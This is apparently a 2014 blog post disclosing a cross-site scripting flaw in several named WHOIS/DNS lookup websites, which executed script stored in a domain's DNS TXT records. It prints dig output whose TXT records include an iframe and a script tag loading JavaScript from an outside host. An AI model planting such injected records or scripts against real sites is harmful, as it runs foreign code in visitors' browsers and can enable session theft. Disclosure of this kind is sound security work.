XSS via DNS

XSS (Cross-Site Scripting) attack is a type of injection, in which malicious scripts are injected into trusted web sites. Your browser has no way to know that the script should not be trusted, and will execute the script. In this case, the script can access any cookies, session tokens, or other sensitive information which can be passed to the attacker.

The golden rule “Do not trust user input” seems forgotten in some cases. The guy succeeded to inject malicious script via TXT record on his domain and the script is promptly executed when you check his domain via Whois services.

The vulnerable sites:
http://who.is/
http://mxtoolbox.com/
http://dig.whois.com.au/

Some of them are already patched but the taste remains đŸ™‚

The ycombinator discussion: https://news.ycombinator.com/item?id=8336025

The exact TXT content:

comp@comp ~ $ dig txt jamiehankins.co.uk
 
; <<>> DiG 9.9.5-3-Ubuntu <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24931
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3
 
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.		IN	TXT
 
;; ANSWER SECTION:
jamiehankins.co.uk.	300	IN	TXT	"google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.	300	IN	TXT	"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.	300	IN	TXT	"v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.	300	IN	TXT	"<script src='//peniscorp.com/topkek.js'></script>"
 
;; AUTHORITY SECTION:
jamiehankins.co.uk.	172800	IN	NS	hank.ns.cloudflare.com.
jamiehankins.co.uk.	172800	IN	NS	lucy.ns.cloudflare.com.
 
;; ADDITIONAL SECTION:
hank.ns.cloudflare.com.	11832	IN	A	173.245.59.116
hank.ns.cloudflare.com.	11832	IN	AAAA	2400:cb00:2049:1::adf5:3b74
 
;; Query time: 81 msec
;; SERVER: 127.0.1.1#53(127.0.1.1)
;; WHEN: Thu Sep 18 23:21:30 CEST 2014
;; MSG SIZE  rcvd: 481

Leave a Reply

Your email address will not be published. Required fields are marked *